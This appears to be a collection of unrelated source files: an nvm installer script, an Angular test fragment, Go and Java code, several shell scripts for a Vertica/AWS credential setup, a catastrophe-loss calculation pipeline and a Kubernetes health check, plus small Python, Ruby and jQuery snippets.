expect(ponyComponents).not.toBeNull('You should display a `PonyComponent` for each pony');
expect(ponyComponents.length).toBe(2, 'You should display a `PonyComponent` for each pony');
const sunnySunday = ponyComponents[0];
expect(sunnySunday.componentInstance.isRunning).toBeTruthy('Each pony should be running (use the `isRunning` input)');
const sunnySundayDiv = divWithPonies[0];
expect(sunnySundayDiv.getAttribute('style')).toBe('margin-left: 0%;',
'The `margin-left` style should match the pony\'s position in percent minus 10');
});
});
|
#!/usr/bin/env bash
{ # this ensures the entire script is downloaded #
nvm_has() {
type "$1" > /dev/null 2>&1
}
nvm_default_install_dir() {
[ -z "${XDG_CONFIG_HOME-}" ] && printf %s "${HOME}/.nvm" || printf %s "${XDG_CONFIG_HOME}/nvm"
}
nvm_install_dir() {
if [ -n "$NVM_DIR" ]; then
printf %s "${NVM_DIR}"
else
nvm_default_install_dir
fi
}
nvm_latest_version() {
echo "v0.37.2"
}
nvm_profile_is_bash_or_zsh() {
local TEST_PROFILE
TEST_PROFILE="${1-}"
case "${TEST_PROFILE-}" in
*"/.bashrc" | *"/.bash_profile" | *"/.zshrc")
return
;;
*)
return 1
;;
esac
}
#
# Outputs the location to NVM depending on:
# * The availability of $NVM_SOURCE
# * The method used ("script" or "git" in the script, defaults to "git")
# NVM_SOURCE always takes precedence unless the method is "script-nvm-exec"
#
nvm_source() {
local NVM_METHOD
NVM_METHOD="$1"
local NVM_SOURCE_URL
NVM_SOURCE_URL="$NVM_SOURCE"
if [ "_$NVM_METHOD" = "_script-nvm-exec" ]; then
NVM_SOURCE_URL="https://raw.githubusercontent.com/nvm-sh/nvm/$(nvm_latest_version)/nvm-exec"
elif [ "_$NVM_METHOD" = "_script-nvm-bash-completion" ]; then
NVM_SOURCE_URL="https://raw.githubusercontent.com/nvm-sh/nvm/$(nvm_latest_version)/bash_completion"
elif [ -z "$NVM_SOURCE_URL" ]; then
if [ "_$NVM_METHOD" = "_script" ]; then
NVM_SOURCE_URL="https://raw.githubusercontent.com/nvm-sh/nvm/$(nvm_latest_version)/nvm.sh"
elif [ "_$NVM_METHOD" = "_git" ] || [ -z "$NVM_METHOD" ]; then
NVM_SOURCE_URL="https://github.com/nvm-sh/nvm.git"
else
echo >&2 "Unexpected value \"$NVM_METHOD\" for \$NVM_METHOD"
return 1
fi
fi
echo "$NVM_SOURCE_URL"
}
#
# Node.js version to install
#
nvm_node_version() {
echo "$NODE_VERSION"
}
nvm_download() {
if nvm_has "curl"; then
curl --compressed -q "$@"
elif nvm_has "wget"; then
# Emulate curl with wget
ARGS=$(echo "$*" | command sed -e 's/--progress-bar /--progress=bar /' \
-e 's/-L //' \
-e 's/--compressed //' \
-e 's/-I /--server-response /' \
-e 's/-s /-q /' \
-e 's/-o /-O /' \
-e 's/-C - /-c /')
# shellcheck disable=SC2086
eval wget $ARGS
fi
}
install_nvm_from_git() {
local INSTALL_DIR
INSTALL_DIR="$(nvm_install_dir)"
if [ -d "$INSTALL_DIR/.git" ]; then
echo "=> nvm is already installed in $INSTALL_DIR, trying to update using git"
command printf '\r=> '
command git --git-dir="$INSTALL_DIR"/.git --work-tree="$INSTALL_DIR" fetch origin tag "$(nvm_latest_version)" --depth=1 2> /dev/null || {
echo >&2 "Failed to update nvm, run 'git fetch' in $INSTALL_DIR yourself."
exit 1
}
else
# Cloning to $INSTALL_DIR
echo "=> Downloading nvm from git to '$INSTALL_DIR'"
command printf '\r=> '
mkdir -p "${INSTALL_DIR}"
if [ "$(ls -A "${INSTALL_DIR}")" ]; then
command git init "${INSTALL_DIR}" || {
echo >&2 'Failed to initialize nvm repo. Please report this!'
exit 2
}
command git --git-dir="${INSTALL_DIR}/.git" remote add origin "$(nvm_source)" 2> /dev/null \
|| command git --git-dir="${INSTALL_DIR}/.git" remote set-url origin "$(nvm_source)" || {
echo >&2 'Failed to add remote "origin" (or set the URL). Please report this!'
exit 2
}
command git --git-dir="${INSTALL_DIR}/.git" fetch origin tag "$(nvm_latest_version)" --depth=1 || {
echo >&2 'Failed to fetch origin with tags. Please report this!'
exit 2
}
else
command git -c advice.detachedHead=false clone "$(nvm_source)" -b "$(nvm_latest_version)" --depth=1 "${INSTALL_DIR}" || {
echo >&2 'Failed to clone nvm repo. Please report this!'
exit 2
}
fi
fi
command git -c advice.detachedHead=false --git-dir="$INSTALL_DIR"/.git --work-tree="$INSTALL_DIR" checkout -f --quiet "$(nvm_latest_version)"
if [ -n "$(command git --git-dir="$INSTALL_DIR"/.git --work-tree="$INSTALL_DIR" show-ref refs/heads/master)" ]; then
if command git --git-dir="$INSTALL_DIR"/.git --work-tree="$INSTALL_DIR" branch --quiet 2>/dev/null; then
command git --git-dir="$INSTALL_DIR"/.git --work-tree="$INSTALL_DIR" branch --quiet -D master >/dev/null 2>&1
else
echo >&2 "Your version of git is out of date. Please update it!"
command git --git-dir="$INSTALL_DIR"/.git --work-tree="$INSTALL_DIR" branch -D master >/dev/null 2>&1
fi
fi
echo "=> Compressing and cleaning up git repository"
if ! command git --git-dir="$INSTALL_DIR"/.git --work-tree="$INSTALL_DIR" reflog expire --expire=now --all; then
echo >&2 "Your version of git is out of date. Please update it!"
fi
if ! command git --git-dir="$INSTALL_DIR"/.git --work-tree="$INSTALL_DIR" gc --auto --aggressive --prune=now ; then
echo >&2 "Your version of git is out of date. Please update it!"
fi
return
}
#
# Automatically install Node.js
#
nvm_install_node() {
local NODE_VERSION_LOCAL
NODE_VERSION_LOCAL="$(nvm_node_version)"
if [ -z "$NODE_VERSION_LOCAL" ]; then
return 0
fi
echo "=> Installing Node.js version $NODE_VERSION_LOCAL"
nvm install "$NODE_VERSION_LOCAL"
local CURRENT_NVM_NODE
CURRENT_NVM_NODE="$(nvm_version current)"
if [ "$(nvm_version "$NODE_VERSION_LOCAL")" == "$CURRENT_NVM_NODE" ]; then
echo "=> Node.js version $NODE_VERSION_LOCAL has been successfully installed"
else
echo >&2 "Failed to install Node.js $NODE_VERSION_LOCAL"
fi
}
install_nvm_as_script() {
local INSTALL_DIR
INSTALL_DIR="$(nvm_install_dir)"
local NVM_SOURCE_LOCAL
NVM_SOURCE_LOCAL="$(nvm_source script)"
local NVM_EXEC_SOURCE
NVM_EXEC_SOURCE="$(nvm_source script-nvm-exec)"
local NVM_BASH_COMPLETION_SOURCE
NVM_BASH_COMPLETION_SOURCE="$(nvm_source script-nvm-bash-completion)"
# Downloading to $INSTALL_DIR
mkdir -p "$INSTALL_DIR"
if [ -f "$INSTALL_DIR/nvm.sh" ]; then
echo "=> nvm is already installed in $INSTALL_DIR, trying to update the script"
else
echo "=> Downloading nvm as script to '$INSTALL_DIR'"
fi
nvm_download -s "$NVM_SOURCE_LOCAL" -o "$INSTALL_DIR/nvm.sh" || {
echo >&2 "Failed to download '$NVM_SOURCE_LOCAL'"
return 1
} &
nvm_download -s "$NVM_EXEC_SOURCE" -o "$INSTALL_DIR/nvm-exec" || {
echo >&2 "Failed to download '$NVM_EXEC_SOURCE'"
return 2
} &
nvm_download -s "$NVM_BASH_COMPLETION_SOURCE" -o "$INSTALL_DIR/bash_completion" || {
echo >&2 "Failed to download '$NVM_BASH_COMPLETION_SOURCE'"
return 2
} &
for job in $(jobs -p | command sort)
do
wait "$job" || return $?
done
chmod a+x "$INSTALL_DIR/nvm-exec" || {
echo >&2 "Failed to mark '$INSTALL_DIR/nvm-exec' as executable"
return 3
}
}
nvm_try_profile() {
if [ -z "${1-}" ] || [ ! -f "${1}" ]; then
return 1
fi
echo "${1}"
}
#
# Detect profile file if not specified as environment variable
# (eg: PROFILE=~/.myprofile)
# The echo'ed path is guaranteed to be an existing file
# Otherwise, an empty string is returned
#
nvm_detect_profile() {
if [ "${PROFILE-}" = '/dev/null' ]; then
# the user has specifically requested NOT to have nvm touch their profile
return
fi
if [ -n "${PROFILE}" ] && [ -f "${PROFILE}" ]; then
echo "${PROFILE}"
return
fi
local DETECTED_PROFILE
DETECTED_PROFILE=''
if [ -n "${BASH_VERSION-}" ]; then
if [ -f "$HOME/.bashrc" ]; then
DETECTED_PROFILE="$HOME/.bashrc"
elif [ -f "$HOME/.bash_profile" ]; then
DETECTED_PROFILE="$HOME/.bash_profile"
fi
elif [ -n "${ZSH_VERSION-}" ]; then
DETECTED_PROFILE="$HOME/.zshrc"
fi
if [ -z "$DETECTED_PROFILE" ]; then
for EACH_PROFILE in ".profile" ".bashrc" ".bash_profile" ".zshrc"
do
if DETECTED_PROFILE="$(nvm_try_profile "${HOME}/${EACH_PROFILE}")"; then
break
fi
done
fi
if [ -n "$DETECTED_PROFILE" ]; then
echo "$DETECTED_PROFILE"
fi
}
#
# Check whether the user has any globally-installed npm modules in their system
# Node, and warn them if so.
#
nvm_check_global_modules() {
command -v npm >/dev/null 2>&1 || return 0
local NPM_VERSION
NPM_VERSION="$(npm --version)"
NPM_VERSION="${NPM_VERSION:--1}"
[ "${NPM_VERSION%%[!-0-9]*}" -gt 0 ] || return 0
local NPM_GLOBAL_MODULES
NPM_GLOBAL_MODULES="$(
npm list -g --depth=0 |
command sed -e '/ npm@/d' -e '/ (empty)$/d'
)"
local MODULE_COUNT
MODULE_COUNT="$(
command printf %s\\n "$NPM_GLOBAL_MODULES" |
command sed -ne '1!p' | # Remove the first line
wc -l | command tr -d ' ' # Count entries
)"
if [ "${MODULE_COUNT}" != '0' ]; then
# shellcheck disable=SC2016
echo '=> You currently have modules installed globally with `npm`. These will no'
# shellcheck disable=SC2016
echo '=> longer be linked to the active version of Node when you install a new node'
# shellcheck disable=SC2016
echo '=> with `nvm`; and they may (depending on how you construct your `$PATH`)'
# shellcheck disable=SC2016
echo '=> override the binaries of modules installed with `nvm`:'
echo
command printf %s\\n "$NPM_GLOBAL_MODULES"
echo '=> If you wish to uninstall them at a later point (or re-install them under your'
# shellcheck disable=SC2016
echo '=> `nvm` Nodes), you can remove them from the system Node as follows:'
echo
echo ' $ nvm use system'
echo ' $ npm uninstall -g a_module'
echo
fi
}
nvm_do_install() {
if [ -n "${NVM_DIR-}" ] && ! [ -d "${NVM_DIR}" ]; then
if [ -e "${NVM_DIR}" ]; then
echo >&2 "File \"${NVM_DIR}\" has the same name as installation directory."
exit 1
fi
if [ "${NVM_DIR}" = "$(nvm_default_install_dir)" ]; then
mkdir "${NVM_DIR}"
else
echo >&2 "You have \$NVM_DIR set to \"${NVM_DIR}\", but that directory does not exist. Check your profile files and environment."
exit 1
fi
fi
if [ -z "${METHOD}" ]; then
# Autodetect install method
if nvm_has git; then
install_nvm_from_git
elif nvm_has nvm_download; then
install_nvm_as_script
else
echo >&2 'You need git, curl, or wget to install nvm'
exit 1
fi
elif [ "${METHOD}" = 'git' ]; then
if ! nvm_has git; then
echo >&2 "You need git to install nvm"
exit 1
fi
install_nvm_from_git
elif [ "${METHOD}" = 'script' ]; then
if ! nvm_has nvm_download; then
echo >&2 "You need curl or wget to install nvm"
exit 1
fi
install_nvm_as_script
else
echo >&2 "The environment variable \$METHOD is set to \"${METHOD}\", which is not recognized as a valid installation method."
exit 1
fi
echo
local NVM_PROFILE
NVM_PROFILE="$(nvm_detect_profile)"
local PROFILE_INSTALL_DIR
PROFILE_INSTALL_DIR="$(nvm_install_dir | command sed "s:^$HOME:\$HOME:")"
SOURCE_STR="\\nexport NVM_DIR=\"${PROFILE_INSTALL_DIR}\"\\n[ -s \"\$NVM_DIR/nvm.sh\" ] && \\. \"\$NVM_DIR/nvm.sh\" # This loads nvm\\n"
# shellcheck disable=SC2016
COMPLETION_STR='[ -s "$NVM_DIR/bash_completion" ] && \. "$NVM_DIR/bash_completion" # This loads nvm bash_completion\n'
BASH_OR_ZSH=false
if [ -z "${NVM_PROFILE-}" ] ; then
local TRIED_PROFILE
if [ -n "${PROFILE}" ]; then
TRIED_PROFILE="${NVM_PROFILE} (as defined in \$PROFILE), "
fi
echo "=> Profile not found. Tried ${TRIED_PROFILE-}~/.bashrc, ~/.bash_profile, ~/.zshrc, and ~/.profile."
echo "=> Create one of them and run this script again"
echo " OR"
echo "=> Append the following lines to the correct file yourself:"
command printf "${SOURCE_STR}"
echo
else
if nvm_profile_is_bash_or_zsh "${NVM_PROFILE-}"; then
BASH_OR_ZSH=true
fi
if ! command grep -qc '/nvm.sh' "$NVM_PROFILE"; then
echo "=> Appending nvm source string to $NVM_PROFILE"
command printf "${SOURCE_STR}" >> "$NVM_PROFILE"
else
echo "=> nvm source string already in ${NVM_PROFILE}"
fi
# shellcheck disable=SC2016
if ${BASH_OR_ZSH} && ! command grep -qc '$NVM_DIR/bash_completion' "$NVM_PROFILE"; then
echo "=> Appending bash_completion source string to $NVM_PROFILE"
command printf "$COMPLETION_STR" >> "$NVM_PROFILE"
else
echo "=> bash_completion source string already in ${NVM_PROFILE}"
fi
fi
if ${BASH_OR_ZSH} && [ -z "${NVM_PROFILE-}" ] ; then
echo "=> Please also append the following lines to the if you are using bash/zsh shell:"
command printf "${COMPLETION_STR}"
fi
# Source nvm
# shellcheck source=/dev/null
\. "$(nvm_install_dir)/nvm.sh"
nvm_check_global_modules
nvm_install_node
nvm_reset
echo "=> Close and reopen your terminal to start using nvm or run the following to use it now:"
command printf "${SOURCE_STR}"
if ${BASH_OR_ZSH} ; then
command printf "${COMPLETION_STR}"
fi
}
#
# Unsets the various functions defined
# during the execution of the install script
#
nvm_reset() {
unset -f nvm_has nvm_install_dir nvm_latest_version nvm_profile_is_bash_or_zsh \
nvm_source nvm_node_version nvm_download install_nvm_from_git nvm_install_node \
install_nvm_as_script nvm_try_profile nvm_detect_profile nvm_check_global_modules \
nvm_do_install nvm_reset nvm_default_install_dir
}
[ "_$NVM_ENV" = "_testing" ] || nvm_do_install
} # this ensures the entire script is downloaded #
|
#!/usr/bin/env bash
#Source your vertica credentials
if [ -f .Renviron ]
then
source .Renviron
fi
#Generate vertica.ini from environment variables
cat << EOM > vertica.ini
[DEFAULT]
host=$vertica_host
port=$vertica_port
database=advana
user=$vertica_user
password=$vertica_password
EOM
#Get aws s3 credentials from Vertica
#Install this tool with the following command:
#pip install git+ssh://git@github.com/massmutual/set-aws-credentials
set-aws-credentials vertica.ini data-scientist
#Source aws-credentials then remove them and vertica.ini
source ./aws-credentials.sh
rm aws-credentials.sh vertica.ini
|
import re
def calculate_total_stars(typescript_snippet):
stars_pattern = r'<gh_stars>(\d+)'
module_pattern = r'export \* from .+?;'
total_stars = 0
# Extract total stars for the TypeScript file
total_stars_match = re.search(stars_pattern, typescript_snippet)
if total_stars_match:
total_stars = int(total_stars_match.group(1))
# Extract stars for each module and calculate total stars
module_matches = re.findall(module_pattern, typescript_snippet)
for module in module_matches:
stars_match = re.search(r'(\d+)$', module)
if stars_match:
total_stars += int(stars_match.group(1))
return total_stars
typescript_snippet = """
<gh_stars>0
/*
* Public API Surface of pdbloader
*/
export * from './lib/main';
export * from './lib/loaderPDB.module';
export * from './lib/PDBLoader';
"""
print(calculate_total_stars(typescript_snippet)) # Output: 0 (sum of all stars) |
#!/usr/bin/env -S bash -euET -o pipefail -O inherit_errexit
SCRIPT=$(readlink -f "$0") && cd $(dirname "$SCRIPT")
# --- Script Init ---
mkdir -p log
rm -R -f log/*
# --- Setup run dirs ---
find output -type f -not -name '*summary-info*' -not -name '*.json' -exec rm -R -f {} +
rm -R -f /tmp/%FIFO_DIR%/fifo/*
rm -R -f work/*
mkdir work/kat/
mkdir work/gul_S1_summaryleccalc
mkdir work/gul_S1_summaryaalcalc
mkdir work/il_S1_summaryleccalc
mkdir work/il_S1_summaryaalcalc
mkfifo /tmp/%FIFO_DIR%/fifo/gul_P5
mkfifo /tmp/%FIFO_DIR%/fifo/gul_S1_summary_P5
mkfifo /tmp/%FIFO_DIR%/fifo/gul_S1_summary_P5.idx
mkfifo /tmp/%FIFO_DIR%/fifo/gul_S1_eltcalc_P5
mkfifo /tmp/%FIFO_DIR%/fifo/gul_S1_summarycalc_P5
mkfifo /tmp/%FIFO_DIR%/fifo/gul_S1_pltcalc_P5
mkfifo /tmp/%FIFO_DIR%/fifo/il_P5
mkfifo /tmp/%FIFO_DIR%/fifo/il_S1_summary_P5
mkfifo /tmp/%FIFO_DIR%/fifo/il_S1_summary_P5.idx
mkfifo /tmp/%FIFO_DIR%/fifo/il_S1_eltcalc_P5
mkfifo /tmp/%FIFO_DIR%/fifo/il_S1_summarycalc_P5
mkfifo /tmp/%FIFO_DIR%/fifo/il_S1_pltcalc_P5
# --- Do insured loss computes ---
eltcalc -s < /tmp/%FIFO_DIR%/fifo/il_S1_eltcalc_P5 > work/kat/il_S1_eltcalc_P5 & pid1=$!
summarycalctocsv -s < /tmp/%FIFO_DIR%/fifo/il_S1_summarycalc_P5 > work/kat/il_S1_summarycalc_P5 & pid2=$!
pltcalc -s < /tmp/%FIFO_DIR%/fifo/il_S1_pltcalc_P5 > work/kat/il_S1_pltcalc_P5 & pid3=$!
tee < /tmp/%FIFO_DIR%/fifo/il_S1_summary_P5 /tmp/%FIFO_DIR%/fifo/il_S1_eltcalc_P5 /tmp/%FIFO_DIR%/fifo/il_S1_summarycalc_P5 /tmp/%FIFO_DIR%/fifo/il_S1_pltcalc_P5 work/il_S1_summaryaalcalc/P5.bin work/il_S1_summaryleccalc/P5.bin > /dev/null & pid4=$!
tee < /tmp/%FIFO_DIR%/fifo/il_S1_summary_P5.idx work/il_S1_summaryleccalc/P5.idx > /dev/null & pid5=$!
summarycalc -m -f -1 /tmp/%FIFO_DIR%/fifo/il_S1_summary_P5 < /tmp/%FIFO_DIR%/fifo/il_P5 &
# --- Do ground up loss computes ---
eltcalc -s < /tmp/%FIFO_DIR%/fifo/gul_S1_eltcalc_P5 > work/kat/gul_S1_eltcalc_P5 & pid6=$!
summarycalctocsv -s < /tmp/%FIFO_DIR%/fifo/gul_S1_summarycalc_P5 > work/kat/gul_S1_summarycalc_P5 & pid7=$!
pltcalc -s < /tmp/%FIFO_DIR%/fifo/gul_S1_pltcalc_P5 > work/kat/gul_S1_pltcalc_P5 & pid8=$!
tee < /tmp/%FIFO_DIR%/fifo/gul_S1_summary_P5 /tmp/%FIFO_DIR%/fifo/gul_S1_eltcalc_P5 /tmp/%FIFO_DIR%/fifo/gul_S1_summarycalc_P5 /tmp/%FIFO_DIR%/fifo/gul_S1_pltcalc_P5 work/gul_S1_summaryaalcalc/P5.bin work/gul_S1_summaryleccalc/P5.bin > /dev/null & pid9=$!
tee < /tmp/%FIFO_DIR%/fifo/gul_S1_summary_P5.idx work/gul_S1_summaryleccalc/P5.idx > /dev/null & pid10=$!
summarycalc -m -i -1 /tmp/%FIFO_DIR%/fifo/gul_S1_summary_P5 < /tmp/%FIFO_DIR%/fifo/gul_P5 &
eve 5 40 | getmodel | gulcalc -S100 -L100 -r -a1 -i - | tee /tmp/%FIFO_DIR%/fifo/gul_P5 | fmcalc -a2 > /tmp/%FIFO_DIR%/fifo/il_P5 &
wait $pid1 $pid2 $pid3 $pid4 $pid5 $pid6 $pid7 $pid8 $pid9 $pid10
# --- Do insured loss kats ---
kat -s work/kat/il_S1_eltcalc_P5 > output/il_S1_eltcalc.csv & kpid1=$!
kat work/kat/il_S1_pltcalc_P5 > output/il_S1_pltcalc.csv & kpid2=$!
kat work/kat/il_S1_summarycalc_P5 > output/il_S1_summarycalc.csv & kpid3=$!
# --- Do ground up loss kats ---
kat -s work/kat/gul_S1_eltcalc_P5 > output/gul_S1_eltcalc.csv & kpid4=$!
kat work/kat/gul_S1_pltcalc_P5 > output/gul_S1_pltcalc.csv & kpid5=$!
kat work/kat/gul_S1_summarycalc_P5 > output/gul_S1_summarycalc.csv & kpid6=$!
wait $kpid1 $kpid2 $kpid3 $kpid4 $kpid5 $kpid6
|
/*
* Tencent is pleased to support the open source community by making 蓝鲸 available.,
* Copyright (C) 2017-2018 THL A29 Limited, a Tencent company. All rights reserved.
* Licensed under the MIT License (the ",License",); you may not use this file except
* in compliance with the License. You may obtain a copy of the License at
* http://opensource.org/licenses/MIT
* Unless required by applicable law or agreed to in writing, software distributed under
* the License is distributed on an ",AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
* either express or implied. See the License for the specific language governing permissions and
* limitations under the License.
*/
package model_test
import (
"testing"
"configcenter/src/common/mapstr"
"configcenter/src/common/metadata"
"github.com/rs/xid"
"github.com/stretchr/testify/require"
)
func TestManagerModelAttributeGroup(t *testing.T) {
modelMgr := newModel(t)
inputModel := metadata.CreateModel{}
// create a valid model with a valid classificationID
classificationID := xid.New().String()
result, err := modelMgr.CreateOneModelClassification(defaultCtx, metadata.CreateOneModelClassification{
Data: metadata.Classification{
ClassificationID: classificationID,
ClassificationName: "test_classification_name_to_test_create_model",
},
})
require.NoError(t, err)
require.NotEqual(t, uint64(0), result.Created.ID)
inputModel.Spec.ObjCls = classificationID
inputModel.Spec.ObjectName = "delete_create_model"
inputModel.Spec.ObjectID = xid.New().String()
inputModel.Attributes = []metadata.Attribute{
metadata.Attribute{
ObjectID: inputModel.Spec.ObjectID,
PropertyID: xid.New().String(),
PropertyName: xid.New().String(),
},
}
dataResult, err := modelMgr.CreateModel(defaultCtx, inputModel)
require.NoError(t, err)
require.NotNil(t, dataResult)
require.NotEqual(t, uint64(0), dataResult.Created.ID)
// create attribute group
groupID := xid.New().String()
createGrpResult, err := modelMgr.CreateModelAttributeGroup(defaultCtx, inputModel.Spec.ObjectID, metadata.CreateModelAttributeGroup{
Data: metadata.Group{
ObjectID: inputModel.Spec.ObjectID,
GroupID: groupID,
GroupName: "create_group_test",
},
})
require.NoError(t, err)
require.NotNil(t, createGrpResult)
// query attribute group
searchGrpResult, err := modelMgr.SearchModelAttributeGroup(defaultCtx, inputModel.Spec.ObjectID, metadata.QueryCondition{
Condition: mapstr.MapStr{
metadata.GroupFieldGroupID: groupID,
},
})
require.NoError(t, err)
require.NotNil(t, searchGrpResult)
require.Equal(t, int64(1), searchGrpResult.Count)
require.Equal(t, 1, len(searchGrpResult.Info))
require.Equal(t, groupID, searchGrpResult.Info[0].GroupID)
t.Logf("search grp:%v", searchGrpResult)
// update attribute group
updateGrpResult, err := modelMgr.UpdateModelAttributeGroup(defaultCtx, inputModel.Spec.ObjectID, metadata.UpdateOption{
Data: mapstr.MapStr{
metadata.GroupFieldGroupName: "update_test_group",
},
Condition: mapstr.MapStr{
metadata.GroupFieldGroupID: groupID,
},
})
require.NoError(t, err)
require.NotNil(t, updateGrpResult)
require.Equal(t, uint64(1), updateGrpResult.Count)
// delete attribute group
deleteGrpResult, err := modelMgr.DeleteModelAttributeGroup(defaultCtx, inputModel.Spec.ObjectID, metadata.DeleteOption{
Condition: mapstr.MapStr{
metadata.GroupFieldGroupID: groupID,
},
})
require.NoError(t, err)
require.NotNil(t, deleteGrpResult)
require.Equal(t, uint64(1), deleteGrpResult.Count)
}
|
<filename>scroll.js
//scrolling function. linking menu list to relevant content
$(document).ready(function() {
$("#postOne").click(function() {
$('html, body').animate({
scrollTop: $("#Lean").offset().top
}, 2000);
});
$("#postTwo").click(function() {
$('html, body').animate({
scrollTop: $("#Agila-metoder").offset().top
}, 2000);
});
$("#postThree").click(function() {
$('html, body').animate({
scrollTop: $("#Projektmetodiken").offset().top
}, 2000);
});
})
|
package br.com.papyrus.controller;
import javax.swing.text.AttributeSet;
import javax.swing.text.BadLocationException;
import javax.swing.text.PlainDocument;
public class StringLimitada extends PlainDocument {
private int tamanhoMax = 10;
/**
*
* Esta classe cria um JTextfield com restrição na quantidade de caracteres
* que o campo pode receber.
*
* @author Retirado do site GUJ
* @param tamanhoMax O tamanho máximo de caracteres que o campos pode conter
*/
public StringLimitada(int tamanhoMax) {
this.tamanhoMax = tamanhoMax;
}
@Override
public void insertString(int offset, String str, AttributeSet attr) throws BadLocationException {
if (str == null) {
return;
}
String stringAntiga = getText(0, getLength());
int tamanhoNovo = stringAntiga.length() + str.length();
if (tamanhoNovo <= tamanhoMax) {
super.insertString(offset, str, attr);
} else {
super.insertString(offset, "", attr);
}
}
}
|
<filename>cmd/restore_test.go<gh_stars>1-10
package cmd_test
import (
"fmt"
"math/rand"
"os"
"testing"
"time"
"github.com/lvnacapital/algorand-go/cmd"
)
func TestRestore(t *testing.T) {
if os.Getenv("CI") == "true" && !kmdAvailable {
// No Algorand node available
return
}
s1 := rand.NewSource(time.Now().UnixNano())
r1 := rand.New(s1)
cmd.WalletName = walletName
got, err := executeCommand(cmd.AlgorandCmd, "restore", "-w", fmt.Sprintf("%s-%d", walletName, r1.Intn(1000000000)), "-p", walletPassword, "-m", mnemonic)
if got != "" {
expected := "Created wallet successfully."
if got != expected {
t.Errorf("Unexpected output - %v", got)
}
}
if err != nil {
t.Errorf("Unexpected error - %v", err)
}
}
|
# frozen_string_literal: true
set :bundle_command, '/usr/local/bin/bundle exec'
set :output, 'log/rake.log'
set :chronic_options, hours24: true
set :environment_variable, 'REDIS_URL'
set :environment, 'redis://localhost:6379/0'
every 1.hour do
rake 'redis:populate'
end
|
/**
*/
package edu.kit.ipd.sdq.kamp4hmi.model.Kamp4hmiModel;
import edu.kit.ipd.sdq.kamp4iec.model.IECRepository.FunctionBlock;
import edu.kit.ipd.sdq.kamp4iec.model.IECRepository.IsMethod;
import org.eclipse.emf.common.util.EList;
import org.eclipse.emf.ecore.EObject;
/**
* <!-- begin-user-doc -->
* A representation of the model object '<em><b>Mode</b></em>'.
* <!-- end-user-doc -->
*
* <p>
* The following features are supported:
* </p>
* <ul>
* <li>{@link edu.kit.ipd.sdq.kamp4hmi.model.Kamp4hmiModel.Mode#getAffectedFunctionBlocks <em>Affected Function Blocks</em>}</li>
* <li>{@link edu.kit.ipd.sdq.kamp4hmi.model.Kamp4hmiModel.Mode#getAffectedMethods <em>Affected Methods</em>}</li>
* <li>{@link edu.kit.ipd.sdq.kamp4hmi.model.Kamp4hmiModel.Mode#getName <em>Name</em>}</li>
* </ul>
*
* @see edu.kit.ipd.sdq.kamp4hmi.model.Kamp4hmiModel.Kamp4hmiModelPackage#getMode()
* @model
* @generated
*/
public interface Mode extends EObject {
/**
* Returns the value of the '<em><b>Affected Function Blocks</b></em>' reference list.
* The list contents are of type {@link edu.kit.ipd.sdq.kamp4iec.model.IECRepository.FunctionBlock}.
* <!-- begin-user-doc -->
* <p>
* If the meaning of the '<em>Affected Function Blocks</em>' reference list isn't clear,
* there really should be more of a description here...
* </p>
* <!-- end-user-doc -->
* @return the value of the '<em>Affected Function Blocks</em>' reference list.
* @see edu.kit.ipd.sdq.kamp4hmi.model.Kamp4hmiModel.Kamp4hmiModelPackage#getMode_AffectedFunctionBlocks()
* @model
* @generated
*/
EList<FunctionBlock> getAffectedFunctionBlocks();
/**
* Returns the value of the '<em><b>Affected Methods</b></em>' reference list.
* The list contents are of type {@link edu.kit.ipd.sdq.kamp4iec.model.IECRepository.IsMethod}.
* <!-- begin-user-doc -->
* <p>
* If the meaning of the '<em>Affected Methods</em>' reference list isn't clear,
* there really should be more of a description here...
* </p>
* <!-- end-user-doc -->
* @return the value of the '<em>Affected Methods</em>' reference list.
* @see edu.kit.ipd.sdq.kamp4hmi.model.Kamp4hmiModel.Kamp4hmiModelPackage#getMode_AffectedMethods()
* @model
* @generated
*/
EList<IsMethod> getAffectedMethods();
/**
* Returns the value of the '<em><b>Name</b></em>' attribute.
* <!-- begin-user-doc -->
* <p>
* If the meaning of the '<em>Name</em>' attribute isn't clear,
* there really should be more of a description here...
* </p>
* <!-- end-user-doc -->
* @return the value of the '<em>Name</em>' attribute.
* @see #setName(String)
* @see edu.kit.ipd.sdq.kamp4hmi.model.Kamp4hmiModel.Kamp4hmiModelPackage#getMode_Name()
* @model
* @generated
*/
String getName();
/**
* Sets the value of the '{@link edu.kit.ipd.sdq.kamp4hmi.model.Kamp4hmiModel.Mode#getName <em>Name</em>}' attribute.
* <!-- begin-user-doc -->
* <!-- end-user-doc -->
* @param value the new value of the '<em>Name</em>' attribute.
* @see #getName()
* @generated
*/
void setName(String value);
} // Mode
|
#!/bin/bash
:<<EOF
@author:fjg
@license: Apache Licence
@file: check_k8s.sh
@time: 2020/12/24
@contact: fujiangong.fujg@bytedance.com
@site:
@software: PyCharm
EOF
podRestartCheckNum=20
clusterRequestCheckPercent=80
nodeLabel="sfke.role.kubernetes.io/group=general-worker"
#nodeLabel="kubernetes.io/os=linux"
busyboxImage="cloudpricicd.sf-express.com/docker-k8sprivate-local/busybox:latest"
#busyboxImage="busybox:1.28.0"
healthCheckDir="/tmp/healthCheck"
externalDomain=("www.sf-express.com")
internalDomain=("kubernetes.default" "kube-dns.kube-system.svc.cluster.local" "www.sf-express.com")
podStatusCheck=("Running" "Completed" "CrashLoopBackOff" "ImagePullBackOff" "ContainerCreating" "Terminating" "ERROR")
machineId=$(cat /etc/machine-id)
tmpPodName="check-pod-$machineId-$(date +%F)"
export KUBECONFIG="/etc/kubernetes/admin.conf"
export PATH="/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:/root/bin"
if [ ! -d "$healthCheckDir" ]; then
mkdir -p "$healthCheckDir"
fi
check_check_pod(){
if ! kubectl get pods "$tmpPodName" --no-headers >& /dev/null;then
kubectl run "$tmpPodName" --image="$busyboxImage" --restart='Never' -- sleep 1h >& /dev/null
sleep 10s
fi
local podNum=$(kubectl get pods "$tmpPodName"|grep -c Running)
local checkTime=10
local checked=0
while [[ "$podNum" -ne 1 ]]&&[[ "$checked" -lt $checkTime ]] ;do
local podNum=$(kubectl get pods "$tmpPodName"|grep -c Running)
sleep 2s
checked=$((checked+1))
done
if [[ "$podNum" -ne 1 ]]&&[[ "$checked" -eq "$checkTime" ]];then
echo '{"alert_status":"error","check_point":"check_pod_status","check_data":""}'
kubectl delete pods "$tmpPodName" --force >& /dev/null
exit 1
else
echo '{"alert_status":"info","check_point":"check_pod_status","check_data":""}'
fi
}
